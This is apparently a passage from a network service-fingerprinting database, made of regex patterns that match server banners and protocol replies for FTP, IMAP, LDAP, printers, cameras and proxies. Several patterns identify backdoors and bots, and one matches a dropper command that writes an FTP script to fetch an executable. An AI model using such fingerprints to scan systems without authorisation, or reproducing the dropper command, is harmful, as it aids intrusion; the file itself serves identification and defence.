supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 +\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 +\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 +\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup +\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 +\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc +\0\0\0\x0b3999 No go\n +2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n +\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. +\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. +\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. +\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) +\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 +\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) +\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 +GIOP\x01\0\x01\x06\0\0\0\0 +\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 +RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n +\0 +default: unknown printer\n +VSE Line Printer Daemon has rejected this request\.\0\0 +no queue to check\n\0 +EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ +\x02rFactorMonitor\x000400\0 +\0\0\0\t51000000\0\0\0\0[^\0] +0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed +02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed +0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind +0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 +0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed +0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded + +TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) +\0\x04\0 +TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 +ActiveFax Server: Es befinden sich insgesamt +\x03\0\x26 +no entries\n +Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 +\x03\0\0\x0b\x06\xd0\0\0\x12.\0 +\x03\0\0\x0b\x06\xd0\0\0\x03.\0 +\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n +\x03\0\0\x0b\x06\xd0\0\x004\x12\0 +.\0\x01.....\0([^\0]+)\0 +\0\0 +\x74\x4e\x63\x50\0\0\0\x10\x33\x33 +\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 +.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 +\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 +\x18\0\x01\x02Invalid packet length\0 +{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} +\x02\x06 +\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 +HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n +\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) +\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 +\0.\0\0[\x02\x04]\0\0\0 +\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 +/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 